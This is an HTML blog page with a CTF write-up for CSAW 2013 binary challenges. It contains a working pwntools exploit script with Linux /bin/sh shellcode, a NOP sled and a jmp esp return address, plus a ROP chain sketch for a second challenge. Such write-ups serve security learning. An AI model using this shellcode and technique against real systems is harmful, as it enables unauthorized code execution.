<html>
 <head>
<title> Csaw 2013 Writeup </title>

 <link rel="stylesheet" type="text/css" href="test1.css" />
 <link rel="stylesheet" type="text/css" href="fonts.css" />
</head>
<style>

      body {background-color:white;
	border-bottom:1px solid #bfbfbf
         line-height:1.5em;
	color:#222}
 
   p{color:black;
        /*font-style: italic;
       font-family: "Times New Roman";*/
      letter-spacing: 2px;
       font-size: 20px;
       margin-top: 10px;
       margin-bottom: 10px;
        margin-right: 150px;
       margin-left: 150px; 
       }



    h1{ color:black;
         font-style: italic;
        font-size:2.2em;
	font-family:"PT Serif","Georgia","Helvetica Neue",Arial,sans-serif;
	font-weight:normal;
	line-height:1.2em;
	margin-bottom:0.6667em
        margin-right: 150px;
       margin-left: 150px;}

code { 
display: block; white-space: pre-wrap; 
border: 1px solid #000; 
padding: 10px; 
line-height: 1.5em; 
font-family: "Lucida Console", Monaco, monospace; 
} 
.code-str 
{ color:#ff33d4; } 
 .code-comment { color:#3c33ff; } 
 .code-key { color:#9933ff; }
 .code-brown{color:#ba4a00} 


</style>
<body>

<script src="null.js"></script>

<div style="position: relative; background: url('http://hackerbuck.net23.net/css/bgm.png'); width: 1210px; height: 110px;">
 <div style="position: absolute; bottom: 0; left: 0.5em; width: 400px; font-weight: bold; color: #fff;">
 <p style="color:white;font-size:2.2em;"> Blog </p>
 </div>
 </div>


 <br> <br>  <br>          

<h1 class="post-title"> Csaw 2013 400 writeup  </h1>
   
 <br> 

<p>This binary had no protection assuming aslr to be on , it is ripped binary . It had it's own protection mechanism .. it saves the retaddr in a memory location <br>
    and restores it back .. so our goal is to overwrite the mem loc and not the saved eip .. after finding offset of that mem loc we can control eip ...<br>
     to execute to our shellcode we need to bypass the aslr by using <b>jmp esp</b> instruction </p>

<code>
from pwn import * 

shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
nop_sled="\x90"*(417-len(shellcode))

payload=nop_sled+shellcode+pack(0x80e7e53)

p=process('miteegashun')

msg=p.recvlines(2)

print msg

p.send(payload)

p.interactive()
</code>
<br><br>

<p>IN csaw 300 question there is no jmp esp inst but we can call read fun and store it static mem location .. </p>

<code>
read + pop3ret + fd + static + p32(2) + static + "\x90" * 100 + SHELLCODE
send("\xff\xe4") # opcode for jmp esp 
</code>

</body>
</html>